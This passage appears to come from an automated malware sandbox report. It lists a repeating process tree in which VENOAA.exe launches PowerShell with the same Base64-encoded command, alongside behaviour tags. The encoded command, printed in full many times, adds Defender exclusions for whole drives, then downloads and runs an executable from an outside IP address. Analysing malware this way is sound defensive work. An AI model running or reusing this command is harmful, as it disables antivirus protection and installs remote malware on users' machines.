QBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        106⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:3520
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        107⤵
        Executes dropped EXE
        
        PID:3536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        108⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        109⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        110⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:1680
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        111⤵
        Executes dropped EXE
        
        PID:1212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        112⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        113⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        114⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        115⤵
        Executes dropped EXE
        
        PID:4984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        116⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        117⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        118⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        119⤵
        Executes dropped EXE
        
        PID:4196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        120⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        121⤵
        Executes dropped EXE
        
        PID:2192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        122⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        123⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        124⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:1100
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        125⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        126⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        127⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        128⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4892
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        129⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        130⤵
        Blocklisted process makes network request
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        131⤵
        Checks computer location settings
        
        PID:2832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAG